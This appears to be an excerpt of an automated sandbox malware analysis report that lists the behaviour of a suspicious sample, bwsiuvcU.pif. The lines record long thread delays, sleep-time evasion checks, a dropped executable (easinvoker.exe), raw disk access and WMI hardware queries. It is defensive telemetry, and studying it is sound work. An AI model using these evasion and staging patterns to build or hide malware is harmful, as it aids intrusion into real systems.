                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196880
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196766
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196652
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196544
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196403
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196229
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196124
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196012
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1195854
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1195728
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1195608
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1195470
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1195295
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1195143
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1194979
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1194835
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1194719
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199865
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199744
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199618
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199448
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199323
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199199
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199043
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198916
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198764
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198627
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198467
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198331
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1200000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199829
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199704
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199590
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199469
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199359
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199250
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199110
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1199000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198888
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198781
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198657
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198532
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198422
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198297
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198185
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1198078
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197954
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197836
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197730
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197586
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197471
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197344
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197235
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1197094
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196985
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Thread delayed: delay time: 1196875
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3319
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2828
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5125
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4640
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4699
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5088
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Window / User API: threadDelayed 4680
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Window / User API: threadDelayed 5110
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Window / User API: threadDelayed 2876
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Window / User API: threadDelayed 3306
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Window / User API: threadDelayed 3310
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif; Window / User API: threadDelayed 6521
                    Source: C:\Users\user\AppData\Roaming\uc.exe; Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF; API coverage: 8.9 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836; Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7636; Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792; Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852; Thread sleep count: 4699 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856; Thread sleep count: 5088 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884; Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480; Thread sleep count: 4680 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99872s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 6480; Thread sleep count: 5110 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99749s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99640s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99530s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99417s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99297s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99181s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -99071s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98959s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98843s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98734s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98624s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98515s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98399s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98296s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98176s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97945s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97825s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97718s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97499s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97390s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97281s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97169s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -97062s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -96953s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -96843s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -96734s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -96624s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -96515s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1199809s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1199687s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1199305s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1199172s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1197547s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1197435s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1197328s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1197219s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1197109s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1197000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196880s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196766s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196652s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196544s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196403s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196229s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196124s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1196012s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1195854s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1195728s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1195608s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1195470s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1195295s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1195143s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1194979s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1194835s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908; Thread sleep time: -1194719s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -19369081277395017s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928; Thread sleep count: 2876 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99879s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 1928; Thread sleep count: 3306 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99655s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99546s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99435s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99325s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044; Thread sleep time: -99209s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98936s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98822s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98718s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98606s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98484s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98374s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98264s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -98046s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97936s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97797s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97685s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97564s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97424s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97292s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -97180s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199865s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199744s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199618s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199448s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199323s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199199s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1199043s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198916s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198764s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198627s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198467s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 2044Thread sleep time: -1198331s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep count: 32 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -29514790517935264s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992Thread sleep count: 3310 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992Thread sleep count: 6521 > 30
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99751s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99609s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99500s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99388s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99265s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99146s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -99019s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98672s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98342s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98218s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -98109s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97979s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97859s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97750s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97631s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97515s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97390s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -97278s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199829s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199704s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199590s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199469s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199359s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199250s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199110s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1199000s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198888s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198781s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198657s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198532s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198422s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198297s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198185s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1198078s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197954s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197836s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197730s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197586s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197471s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197344s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197235s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1197094s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1196985s >= -30000s
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352Thread sleep time: -1196875s >= -30000s
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 19_2_029858CC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 100000
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99872
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99749
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99640
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99530
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99417
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99297
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99181
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99071
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98959
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98843
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98734
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98624
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98515
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98399
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98296
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98176
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98062
